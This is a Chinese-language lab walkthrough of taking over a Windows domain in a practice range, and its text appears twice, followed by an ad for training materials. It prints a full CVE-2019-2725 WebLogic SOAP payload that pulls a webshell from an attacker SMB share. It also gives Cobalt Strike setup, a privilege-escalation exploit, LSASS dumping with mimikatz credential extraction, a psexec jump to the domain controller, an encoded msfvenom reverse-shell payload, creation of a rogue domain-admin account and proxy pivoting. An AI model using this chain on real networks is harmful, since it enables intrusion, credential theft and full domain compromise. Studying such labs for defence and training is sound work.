内网渗透之域渗透内网渗透之域渗透文章目录内网渗透之域渗透0x01 环境介绍1.实验环境靶场2.域环境初始化3.Kali 环境准备0x02 WebLogic 漏洞利用并 getshell1.信息收集2.利用 CVE-2019-27250x03 域渗透-横向渗透获取域控最高权限1.Cobalt Strike 介绍2.Cobalt Strike 部署3.创建监听4.上传相关利用工具5.反弹 system 权限的 shell 给cs 服务6.明文读取密码7.域信息收集8.通过凭证连接域控反弹域控 shell9.小结0x04内网横向渗透0x05 总结0x01 环境介绍1.实验环境靶场此拓扑图不是本实验图这个图只是为了便于读者理解内网中有哪些东西其实本实验和此拓扑图是有关联的配置信息服务名称IP地址系统应用DC10.10.10.10windows server 2012 R2AD 域WEBIP110.10.10.80 IP2192.168.111.80winsome server 2008Weblogic 10.3.6 MSSQL 2008PCIP110.10.10.201 IP2192.168.111.201windows 7攻击机IP192.168.111.1 win10 IP192.168.111.5 kali2.域环境初始化登录 web 主机启动服务默认密码是 1qazWSX 需要登录时修改修改密码为 zaq1XSW访问路径C:/Oracle/Middleware/user/_projects/domains/base/_domain双击 startWebLogic 启动脚本程序3.Kali 环境准备添加一块 NAT 模式网卡修改虚拟网络地址修改完成后开启虚拟机0x02 WebLogic 漏洞利用并 getshell1.信息收集全端口扫描┌──(rootfengzilin55)-[~/桌面] └─# nmap -p- -T5 192.168.111.80 -o web常用端口是开放状态 1433 是 mssql 7001 是weblogic 服务我们手工在服务器上开启的服务我们使用 weblogicScan 工具扫描一下上传工具到 Kali┌──(rootfengzilin55)-[~/桌面] └─# rz┌──(rootfengzilin55)-[~] └─# unzip WeblogicScan-master.zip ┌──(rootfengzilin55)-[~] └─# cd WeblogicScan-master ┌──(rootfengzilin55)-[~/WeblogicScan-master] └─# python3 WeblogicScan.py 192.168.111.80 7001可以看到一共存在 2 个CVE 我们使用 CVE-2019-2725 使用该漏洞拿到 shell2.利用 CVE-2019-2725本次使用的冰蝎是在 kali linux 环境下使用 需要自行下载冰蝎Kali 搭建 smbserver 通过命令执行直接 copy 冰蝎 马到服务器上拷贝 冰蝎 server 目录下的木马┌──(root??fengzilin55)-[~/server] └─# cp /root/server/shell.jsp /share启动 smbserver 名称为 share 目录为 /root/┌──(rootfengzilin55)-[~/桌面] └─# cd /share ┌──(rootfengzilin55)-[/share] └─# impacket-smbserver share /share/ #在当前创建的 share目录下启动 SMB server共享名为 share注下载文件copy //IP/ShareName/file.exe file.exe打开 burpsuite将 POC 复制 Repeater 中进行发包POST /_async/AsyncResponseService HTTP/1.1 Host: 192.168.111.80:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3 DNT: 1 Connection: close Content-Type: text/xml Content-Length: 839 soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ xmlns:wsahttp://www.w3.org/2005/08/addressing xmlns:asyhttp://www.bea.com/async/AsyncResponseService soapenv:Header wsa:Actionxx/wsa:Action wsa:RelatesToxx/wsa:RelatesTo work:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/ void classjava.lang.ProcessBuilder array classjava.lang.String length3 void index0 stringcmd/string /void void index1 string/c/string /void void index2 stringcopy //192.168.111.5/share/shell.jsp servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/1.jsp /string /void /array void methodstart//void /work:WorkContext /soapenv:Header soapenv:Body asy:onAsyncDelivery/ /soapenv:Body/soapenv:Envelope再次发送去服务器上检查拷贝情况访问路径C:/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war如果在 kali Linux 下运行冰蝎出现以下问题请访问https://openjfx.cn/dl/下载完成后将数据包解压将 lib 目录拷贝至冰蝎同目录下运行 冰蝎┌──(rootfengzilin55)-[~] └─# java -jar Behinder.jar冰蝎连接路径http://192.168.111.80:7001/_async/1.jsprebeyond连接成功查看权限whoami查看打了哪些补丁systeminfo0x03 域渗透-横向渗透获取域控最高权限1.Cobalt Strike 介绍Cobalt Strike 是一个为对手模拟和红队行动而设计的平台主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。2.Cobalt Strike 部署上传 Cobalt Strike 4 进入目录下添加执行权限┌──(rootfengzilin55)-[~/dc]└─# chmod x start.sh teamserver运行服务端┌──(rootfengzilin55)-[~/dc]└─# ./teamserver 192.168.111.5 123456运行客户端┌──(rootfengzilin55)-[~/dc]└─# ./start.sh用户名随意填写CS 支持多人协助工作密码是 1234563.创建监听启动服务端的时候生成了一段 hash 确认 hash 没错点击确认即可。创建监听添加生成 exe4.上传相关利用工具使用冰蝎将生成的木马传入这里C:/Oracle/Middleware/user/_projects/domains/base/_domain/servers/AdminServer/tmp//_WL/_internal/bea/_wls9/_async/_response/8tpkys/war/根据前面系统没有安装什么补丁我们直接利用工具提权即可[01]: KB2999226[02]: KB958488[03]: KB976902把我们后面使用的工具全部上传提权工具以及读取密码的工具上传5.反弹 system 权限的 shell 给cs 服务先切换到我们上传文件的目录运行 web.exe 返回一个 de1ay 用户的 shell提示使用 shiftinsert 可以粘贴到冰蝎终端cd C:/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/web.exe打开会话窗口设置命令执行周期默认是 60秒 我们修改为 2 秒sleep 2提权成功shell CVE-2019-0803.exe cmd start web我们在 system 中也设置一下sleep 26.明文读取密码shell procdump64.exe -accepteula -ma lsass.exe lsass.dmp解密这里数字卫士没有拦击并不说明 mimikatz 是免杀的实际环境如果 mimikatz 不是免杀的需要将 lsass.dmp 文件拖回本地放至相同的系统中进行解密。shell mimikatz.exe sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full exit pass.txt下载 pass.txt 文件download pass.txt查看密码文件 密码文件会放在 cs 的 downloads 目录下┌──(rootfengzilin55)-[~/dc]└─# cd downloads ┌──(rootfengzilin55)-[~/dc/downloads]└─# ls5bd3782f3┌──(rootfengzilin55)-[~/dc/downloads]└─# cat 5bd3782f37.域信息收集mssqlde1ay 1qazWSX de1ayde1ay 1qazWSXde1ayWEB 该用户是我们登录系统用的密码是登录时自行修改的。查看网络信息找到域控shell ipconfig /allDNS 服务器 10.10.10.10 也就是域控。 找到 DC 的主机名shell net group domain controllers /domain主机名DC.de1ay.com8.通过凭证连接域控反弹域控 shell创建新的监听。恢复初始凭证rev2selfmake_token DE1AY/de1ay 1qazWSX #通过前面获取的账号信息生成新的凭证psexec DC C$ smb域控上线拿到域控了 我们开始渗透内网主机9.小结扫描到两台域主机 10.10.10.10 根据之前收集到的信息我们知道。10.10.10.10 是域控 的 IP 主机名为 DC0x04内网横向渗透使用cs上线的web服务扫描该内网的主机net computers de1ay.com使用cs扫描内网主机的端口开放情况portscan 10.10.10.201/24 1-1024,3389得该服务器的权限我们生成msf木马程序反弹shell然后使用代理来攻击内网主机 IP┌──(rootfengzilin55)-[/var/www/html]└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST192.168.111.5 LPORT1234 -b /x00 -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/1.exe生成的木马使用冰蝎传入该网站然后是终端运行木马使用msf监听msf6 use exploit/multi/handler msf6 exploit(multi/handler) set LHOST 192.168.111.5msf6 exploit(multi/handler) set LPORT 1234msf6 exploit(multi/handler) run使用msf 自动添加路由meterpreter run post/multi/manage/autoroute查看路由meterpreter run autoroute -p进入shell添加域用户shellnet user test Aa123456 /domain //添加域用户net group domain admins test /add /domain //将用户加入域管理员组退出shell 退出 meterpreter设置代理msf6 auxiliary(server/socks_proxy) set SRVHOST 192.168.111.5msf6 auxiliary(server/socks_proxy) set SRVPORT 1080msf6 auxiliary(server/socks_proxy) run使用代理远程连接桌面┌──(rootfengzilin55)-[/var/www/html]└─# proxychains rdesktop 10.10.10.201使用该创建的用户登录登录成功0x05 总结内网渗透思路渗透内网终极目标就是获取域控权限。从获取到内网的一台主机开始首先就对该主机进行信息收集可以由以下几个方面来进行信息的收集是否存在多个网段、是否存在域环境、查看服务/端口信息、查看当前用户权限。有域环境则想办法定位域控的IP然后使用hash获取域密码。《网络安全从零到精通全套学习大礼包》96节从入门到精通的全套视频教程免费领取如果你也想通过学网络安全技术去帮助就业和转行我可以把我自己亲自录制的96节 从零基础到精通的视频教程以及配套学习资料无偿分享给你。网络安全学习路线图想要学习 网络安全作为新手一定要先按照路线图学习方向不对努力白费。对于从来没有接触过网络安全的同学我帮大家准备了从零基础到精通学习成长路线图以及学习规划。可以说是最科学最系统的学习路线大家跟着这个路线图学习准没错。配套实战项目/源码所有视频教程所涉及的实战项目和项目源码学习电子书籍学习网络安全必看的书籍和文章的PDF市面上网络安全书籍确实太多了这些是我精选出来的面试真题/经验以上资料如何领取
内网渗透之域渗透
内网渗透之域渗透内网渗透之域渗透文章目录内网渗透之域渗透0x01 环境介绍1.实验环境靶场2.域环境初始化3.Kali 环境准备0x02 WebLogic 漏洞利用并 getshell1.信息收集2.利用 CVE-2019-27250x03 域渗透-横向渗透获取域控最高权限1.Cobalt Strike 介绍2.Cobalt Strike 部署3.创建监听4.上传相关利用工具5.反弹 system 权限的 shell 给cs 服务6.明文读取密码7.域信息收集8.通过凭证连接域控反弹域控 shell9.小结0x04内网横向渗透0x05 总结0x01 环境介绍1.实验环境靶场此拓扑图不是本实验图这个图只是为了便于读者理解内网中有哪些东西其实本实验和此拓扑图是有关联的配置信息服务名称IP地址系统应用DC10.10.10.10windows server 2012 R2AD 域WEBIP110.10.10.80 IP2192.168.111.80winsome server 2008Weblogic 10.3.6 MSSQL 2008PCIP110.10.10.201 IP2192.168.111.201windows 7攻击机IP192.168.111.1 win10 IP192.168.111.5 kali2.域环境初始化登录 web 主机启动服务默认密码是 1qazWSX 需要登录时修改修改密码为 zaq1XSW访问路径C:/Oracle/Middleware/user/_projects/domains/base/_domain双击 startWebLogic 启动脚本程序3.Kali 环境准备添加一块 NAT 模式网卡修改虚拟网络地址修改完成后开启虚拟机0x02 WebLogic 漏洞利用并 getshell1.信息收集全端口扫描┌──(rootfengzilin55)-[~/桌面] └─# nmap -p- -T5 192.168.111.80 -o web常用端口是开放状态 1433 是 mssql 7001 是weblogic 服务我们手工在服务器上开启的服务我们使用 weblogicScan 工具扫描一下上传工具到 Kali┌──(rootfengzilin55)-[~/桌面] └─# rz┌──(rootfengzilin55)-[~] └─# unzip WeblogicScan-master.zip ┌──(rootfengzilin55)-[~] └─# cd WeblogicScan-master ┌──(rootfengzilin55)-[~/WeblogicScan-master] └─# python3 WeblogicScan.py 192.168.111.80 7001可以看到一共存在 2 个CVE 我们使用 CVE-2019-2725 使用该漏洞拿到 shell2.利用 CVE-2019-2725本次使用的冰蝎是在 kali linux 环境下使用 需要自行下载冰蝎Kali 搭建 smbserver 通过命令执行直接 copy 冰蝎 马到服务器上拷贝 冰蝎 server 目录下的木马┌──(root??fengzilin55)-[~/server] └─# cp /root/server/shell.jsp /share启动 smbserver 名称为 share 目录为 /root/┌──(rootfengzilin55)-[~/桌面] └─# cd /share ┌──(rootfengzilin55)-[/share] └─# impacket-smbserver share /share/ #在当前创建的 share目录下启动 SMB server共享名为 share注下载文件copy //IP/ShareName/file.exe file.exe打开 burpsuite将 POC 复制 Repeater 中进行发包POST /_async/AsyncResponseService HTTP/1.1 Host: 192.168.111.80:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3 DNT: 1 Connection: close Content-Type: text/xml Content-Length: 839 soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ xmlns:wsahttp://www.w3.org/2005/08/addressing xmlns:asyhttp://www.bea.com/async/AsyncResponseService soapenv:Header wsa:Actionxx/wsa:Action wsa:RelatesToxx/wsa:RelatesTo work:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/ void classjava.lang.ProcessBuilder array classjava.lang.String length3 void index0 stringcmd/string /void void index1 string/c/string /void void index2 stringcopy //192.168.111.5/share/shell.jsp servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/1.jsp /string /void /array void methodstart//void /work:WorkContext /soapenv:Header soapenv:Body asy:onAsyncDelivery/ /soapenv:Body/soapenv:Envelope再次发送去服务器上检查拷贝情况访问路径C:/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war如果在 kali Linux 下运行冰蝎出现以下问题请访问https://openjfx.cn/dl/下载完成后将数据包解压将 lib 目录拷贝至冰蝎同目录下运行 冰蝎┌──(rootfengzilin55)-[~] └─# java -jar Behinder.jar冰蝎连接路径http://192.168.111.80:7001/_async/1.jsprebeyond连接成功查看权限whoami查看打了哪些补丁systeminfo0x03 域渗透-横向渗透获取域控最高权限1.Cobalt Strike 介绍Cobalt Strike 是一个为对手模拟和红队行动而设计的平台主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。2.Cobalt Strike 部署上传 Cobalt Strike 4 进入目录下添加执行权限┌──(rootfengzilin55)-[~/dc]└─# chmod x start.sh teamserver运行服务端┌──(rootfengzilin55)-[~/dc]└─# ./teamserver 192.168.111.5 123456运行客户端┌──(rootfengzilin55)-[~/dc]└─# ./start.sh用户名随意填写CS 支持多人协助工作密码是 1234563.创建监听启动服务端的时候生成了一段 hash 确认 hash 没错点击确认即可。创建监听添加生成 exe4.上传相关利用工具使用冰蝎将生成的木马传入这里C:/Oracle/Middleware/user/_projects/domains/base/_domain/servers/AdminServer/tmp//_WL/_internal/bea/_wls9/_async/_response/8tpkys/war/根据前面系统没有安装什么补丁我们直接利用工具提权即可[01]: KB2999226[02]: KB958488[03]: KB976902把我们后面使用的工具全部上传提权工具以及读取密码的工具上传5.反弹 system 权限的 shell 给cs 服务先切换到我们上传文件的目录运行 web.exe 返回一个 de1ay 用户的 shell提示使用 shiftinsert 可以粘贴到冰蝎终端cd C:/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/web.exe打开会话窗口设置命令执行周期默认是 60秒 我们修改为 2 秒sleep 2提权成功shell CVE-2019-0803.exe cmd start web我们在 system 中也设置一下sleep 26.明文读取密码shell procdump64.exe -accepteula -ma lsass.exe lsass.dmp解密这里数字卫士没有拦击并不说明 mimikatz 是免杀的实际环境如果 mimikatz 不是免杀的需要将 lsass.dmp 文件拖回本地放至相同的系统中进行解密。shell mimikatz.exe sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full exit pass.txt下载 pass.txt 文件download pass.txt查看密码文件 密码文件会放在 cs 的 downloads 目录下┌──(rootfengzilin55)-[~/dc]└─# cd downloads ┌──(rootfengzilin55)-[~/dc/downloads]└─# ls5bd3782f3┌──(rootfengzilin55)-[~/dc/downloads]└─# cat 5bd3782f37.域信息收集mssqlde1ay 1qazWSX de1ayde1ay 1qazWSXde1ayWEB 该用户是我们登录系统用的密码是登录时自行修改的。查看网络信息找到域控shell ipconfig /allDNS 服务器 10.10.10.10 也就是域控。 找到 DC 的主机名shell net group domain controllers /domain主机名DC.de1ay.com8.通过凭证连接域控反弹域控 shell创建新的监听。恢复初始凭证rev2selfmake_token DE1AY/de1ay 1qazWSX #通过前面获取的账号信息生成新的凭证psexec DC C$ smb域控上线拿到域控了 我们开始渗透内网主机9.小结扫描到两台域主机 10.10.10.10 根据之前收集到的信息我们知道。10.10.10.10 是域控 的 IP 主机名为 DC0x04内网横向渗透使用cs上线的web服务扫描该内网的主机net computers de1ay.com使用cs扫描内网主机的端口开放情况portscan 10.10.10.201/24 1-1024,3389得该服务器的权限我们生成msf木马程序反弹shell然后使用代理来攻击内网主机 IP┌──(rootfengzilin55)-[/var/www/html]└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST192.168.111.5 LPORT1234 -b /x00 -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/1.exe生成的木马使用冰蝎传入该网站然后是终端运行木马使用msf监听msf6 use exploit/multi/handler msf6 exploit(multi/handler) set LHOST 192.168.111.5msf6 exploit(multi/handler) set LPORT 1234msf6 exploit(multi/handler) run使用msf 自动添加路由meterpreter run post/multi/manage/autoroute查看路由meterpreter run autoroute -p进入shell添加域用户shellnet user test Aa123456 /domain //添加域用户net group domain admins test /add /domain //将用户加入域管理员组退出shell 退出 meterpreter设置代理msf6 auxiliary(server/socks_proxy) set SRVHOST 192.168.111.5msf6 auxiliary(server/socks_proxy) set SRVPORT 1080msf6 auxiliary(server/socks_proxy) run使用代理远程连接桌面┌──(rootfengzilin55)-[/var/www/html]└─# proxychains rdesktop 10.10.10.201使用该创建的用户登录登录成功0x05 总结内网渗透思路渗透内网终极目标就是获取域控权限。从获取到内网的一台主机开始首先就对该主机进行信息收集可以由以下几个方面来进行信息的收集是否存在多个网段、是否存在域环境、查看服务/端口信息、查看当前用户权限。有域环境则想办法定位域控的IP然后使用hash获取域密码。《网络安全从零到精通全套学习大礼包》96节从入门到精通的全套视频教程免费领取如果你也想通过学网络安全技术去帮助就业和转行我可以把我自己亲自录制的96节 从零基础到精通的视频教程以及配套学习资料无偿分享给你。网络安全学习路线图想要学习 网络安全作为新手一定要先按照路线图学习方向不对努力白费。对于从来没有接触过网络安全的同学我帮大家准备了从零基础到精通学习成长路线图以及学习规划。可以说是最科学最系统的学习路线大家跟着这个路线图学习准没错。配套实战项目/源码所有视频教程所涉及的实战项目和项目源码学习电子书籍学习网络安全必看的书籍和文章的PDF市面上网络安全书籍确实太多了这些是我精选出来的面试真题/经验以上资料如何领取
